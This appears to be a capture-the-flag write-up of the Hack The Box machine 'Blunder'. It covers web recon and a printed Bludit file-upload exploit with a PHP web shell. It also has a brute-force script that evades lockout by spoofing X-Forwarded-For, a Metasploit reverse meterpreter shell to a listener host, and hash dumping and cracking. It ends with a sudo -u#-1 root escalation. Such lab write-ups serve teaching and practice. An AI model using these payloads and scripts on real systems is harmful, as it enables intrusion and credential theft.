Recon

Starting with an nmap scan:

nmap -A 10.10.10.191 -o nmap
Starting Nmap 7.80 ( https:*//nmap.org ) at 2020-05-31 17:45 +0545*
Nmap scan report for 10.10.10.191
Host is up (0.38s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
21/tcp closed ftp
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts
Aggressive OS guesses: HP P2000 G3 NAS device (91%), Linux 2.6.32 (90%), Infomir MAG-250 set-top box (90%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (90%), Linux 3.7 (90%), Netgear RAIDiator 4.2.21 (Linux 2.6.37) (90%), Linux 2.6.32 - 3.13 (89%), Linux 3.0 - 3.2 (89%), Linux 3.3 (89%), Linux 2.6.32 - 3.1 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 21/tcp)
HOP RTT ADDRESS
1 309.94 ms 10.10.14.1
2 395.75 ms 10.10.10.191
OS and Service detection performed. Please report any incorrect results at https:*//nmap.org/submit/ .*
Nmap done: 1 IP address (1 host up) scanned in 66.67 seconds

We see only one port open, 80, which makes it really interesting.But, I think I should run a full port scan, so that we don't miss anything:

nmap -p- -A -T4 10.10.10.191 -o allports

In the mean time, let's look at the website and also run some content discovery on it in the background.

ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http:*//10.10.10.191/FUZZ -t 500*

Now, looking around at the website, viewing the source, we see that there are some js files, and the path to them seems interesting.Looking at the url: http://10.10.10.191/bl-kernel/js/jquery.min.js we see that it is inside a few directories, let's see if we can list the contents of those directories.

http://10.10.10.191/bl-kernel/js/http://10.10.10.191/bl-kernel/

Here, we can see a lot of interesting files. Looking at those files, we can find out that it is running Bludit CMS.

Coming back to ffuf, we see:

.htaccess               [Status: 403, Size: 277, Words: 20, Lines: 10]
.htpasswd               [Status: 403, Size: 277, Words: 20, Lines: 10]
LICENSE                 [Status: 200, Size: 1083, Words: 155, Lines: 22]
about                   [Status: 200, Size: 3280, Words: 225, Lines: 106]
admin                   [Status: 301, Size: 0, Words: 1, Lines: 1]
cgi-bin/                [Status: 301, Size: 0, Words: 1, Lines: 1]
robots.txt              [Status: 200, Size: 22, Words: 3, Lines: 2]
server-status           [Status: 403, Size: 277, Words: 20, Lines: 10]
usb                     [Status: 200, Size: 3959, Words: 304, Lines: 111]

Let's check them out.At /admin we see a login portal. Trying out admin:admin, of course we don't get in.

Now, let's see if there are any available exploits for Bludit CMS. And, as this box is marked heavily as CTF like and CVE, I'm hoping that we can find an exploit for this.Also, our all port scan results came in and no other ports are open.

searchsploit Bludit

We see that there are these two exploits:

Bludit - Directory Traversal Image File Upload (Metasploit)
bludit Pages Editor 3.0.0 - Arbitrary File Upload

Let's checkout non metasploit one first:

cp /usr/share/exploitdb/exploits/php/webapps/46060.txt .
cat 46060.txt
*# Exploit Title: bludit Pages Editor 3.0.0 - Arbitrary File Upload# Date: 2018-10-02# Google Dork: N/A# Exploit Author: BouSalman# Vendor Homepage: https://www.bludit.com/# Software Link: N/A# Version: 3.0.0# Tested on: Ubuntu 18.04# CVE : 2018-1000811*POST /admin/ajax/upload-files HTTP/1.1
Host: 192.168.140.154
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.140.154/admin/new-content
X-Requested-With: XMLHttpRequest
Content-Length: 415
Content-Type: multipart/form-data; boundary=---------------------------26228568510541774541866388118
Cookie: BLUDIT-KEY=5s634f6up72tmfi050i4okunf9
Connection: close
-----------------------------26228568510541774541866388118
Content-Disposition: form-data; name="tokenCSRF"
67987ea926223b28949695d6936191d28d320f20
-----------------------------26228568510541774541866388118
Content-Disposition: form-data; name="bluditInputFiles[]"; filename="poc.php"
Content-Type: image/png
<?php system($_GET["cmd"]);?>
-----------------------------26228568510541774541866388118--#

Okay, seems nice.Let's try working with Metasploit one first, as that is easier, and if that doesn't work, we will come back to this.

msfconsole
search bludit
use exploit/linux/http/bludit_upload_images_exec
options

Looking at the options, it seems like we need credentials for this, this seems to be an authenticated exploit.

BLUDITPASS yes The password for Bludit 
BLUDITUSER yes The username for Bludit

As of right now, we don't have any credentials, which is sad. We will get back to this later if we find the credentials.

Let's try opening up Burp and sending the request from our previous exploit and see if that works.

Going to the Repeater tab, and sending that request:

POST /admin/ajax/upload-files HTTP/1.1
Host: 10.10.10.191
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.191/admin/new-content
X-Requested-With: XMLHttpRequest
Content-Length: 415
Content-Type: multipart/form-data; boundary=---------------------------26228568510541774541866388118
Cookie: BLUDIT-KEY=5s634f6up72tmfi050i4okunf9
Connection: close
*----------------------------26228568510541774541866388118*
Content-Disposition: form-data; name="tokenCSRF"
67987ea926223b28949695d6936191d28d320f20
*----------------------------26228568510541774541866388118*
Content-Disposition: form-data; name="bluditInputFiles[]"; filename="poc.php"
Content-Type: image/png
<?php system($_GET["cmd"]);?>
*----------------------------26228568510541774541866388118--*

We get "User not Logged In!". Hmm, so seems like we will need to find the credentials somewhere.

Let's try content discovery again, but this time, let's add a few more extensions.

ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http:*//10.10.10.191/FUZZ -t 500 -e .php,.txt,.html*

And this time, we find something new, todo.txt. Let's check it out.http://10.10.10.191/todo.txt

Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING

Nice, seems like we have a username.

Googling for "Bludit Login Bypass" I found this blog post which was of great help: https://rastating.github.io/bludit-brute-force-mitigation-bypass/

Altough we will need to modify it to our usage.

import re
import requests
host = 'http://10.10.10.191'
login_url = host + '/admin/login'
username = 'fergus'
wordlist = []
with open("blundercewl_wordlist.txt","r", errors="ignore") as file: for line in file: wordlist.append(line.rstrip())
for password in wordlist: session = requests.Session() login_page = session.get(login_url) csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1) print('[*] Trying: {p}'.format(p = password)) headers = { 'X-Forwarded-For': password, 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36', 'Referer': login_url } data = { 'tokenCSRF': csrf_token, 'username': username, 'password': password, 'save': '' } login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False) if 'location' in login_result.headers: if '/admin/dashboard' in login_result.headers['location']: print() print('SUCCESS: Password found!') print('Use {u}:{p} to login.'.format(u = username, p = password)) print() break

And the wordlist that we will use to go along with this is blundercewl_wordlist.txt which we will create now.

cewl http:*//10.10.10.191/ -w blundercewl_wordlist.txt -m 8 -w blundercewl_wordlist.txt*

Now, let's run this:

python bruteforce.py

After a while, we get a password: RolandDeschainNow, let's try that Metasploit module:

msfconsole
use exploit/linux/http/bludit_upload_images_exec
set rhosts *10.10.10.191*set *bludituser fergus*set *bluditpass RolandDeschain*set *payload php*/meterpreter/*reverse_tcp*set *lhost 10.10.14.21*
run

And, we get a meterpreter shell! Nice.This is probably the first time that I've used a meterpreter shell.

Now, looking at /home we see that there are two users, hugo and shaun.

However, before we move on, I will close this session and rerun this exploit, this time by passing it through Burp to understand what it does.

We will use all the previous options but add:

set proxies http:*//127.0.0.1:8080/*set ReverseAllowProxy true

Analyzing the traffic in Burp, we see that:

  1. It logs into the Dashboard.
  2. Then uploads a php reverse meterpreter shell as an image giving us a meterpreter shell.

After looking around at the files, I reached: /var/www/bludit-3.9.2/bl-content/databases.

cd /var/www/bludit-3.9.2/bl-content/databases
ls
cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{ "admin": { "nickname": "Admin", "firstName": "Administrator", "lastName": "", "role": "admin", "password": "bfcc887f62e36ea019e3295aafb8a3885966e265", "salt": "5dde2887e7aca", "email": "", "registered": "2019-11-27 07:40:55", "tokenRemember": "", "tokenAuth": "b380cb62057e9da47afce66b4615107d", "tokenAuthTTL": "2009-03-15 14:00", "twitter": "", "facebook": "", "instagram": "", "codepen": "", "linkedin": "", "github": "", "gitlab": "" }, "fergus": { "firstName": "", "lastName": "", "nickname": "", "description": "", "role": "author", "password": "be5e169cdf51bd4c878ae89a0a89de9cc0c9d8c7", "salt": "jqxpjfnv", "email": "", "registered": "2019-11-27 13:26:44", "tokenRemember": "", "tokenAuth": "0e8011811356c0c5bd2211cba8c50471", "tokenAuthTTL": "2009-03-15 14:00", "twitter": "", "facebook": "", "codepen": "", "instagram": "", "github": "", "gitlab": "", "linkedin": "", "mastodon": "" }
}

Here, we have a hash for admin. Nice. Let's see what else we can find.

cd /var/www/bludit-3.10.0a/bl-content/databases
cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{ "admin": { "nickname": "Hugo", "firstName": "Hugo", "lastName": "", "role": "User", "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d", "email": "", "registered": "2019-11-27 07:40:55", "tokenRemember": "", "tokenAuth": "b380cb62057e9da47afce66b4615107d", "tokenAuthTTL": "2009-03-15 14:00", "twitter": "", "facebook": "", "instagram": "", "codepen": "", "linkedin": "", "github": "", "gitlab": ""}
}

Before we move on to cracking, let's check the users that are present in this machine.

ls /home
hugo shaun

As we already have the password hash of Hugo, let's try to identify it and then crack it.

hash-identifier
faca404fd5c0a31cf1897b823c695c85cffeb98d

Putting it into hash-identifier, it suggests that it might be SHA1.

I'm really bad at cracking passwords and crypto stuff, so, I'll try using https://crackstation.net

Copy and paste that hash there, and it gives us the password: Password120

Now, let's try to switch user to Hugo.Before that, we have to go to a normal shell from Meterpreter.

shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm-256color
export SHELL=bash
su - hugo

And entering the password Password120 we get a shell as Hugo! Nice!

PrivEsc

Before we do anything, let's check our sudo permissions:

sudo -l
Matching Defaults entries for hugo on blunder: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User hugo may run the following commands on blunder: (ALL, !root) /bin/bash

So, it seems like we can execute /bin/bash as any user except for root.

After a little bit of googling, I found this really nice trick to use sudo to get root:

sudo -u*#-1 /bin/bash*

And, now, you should be root!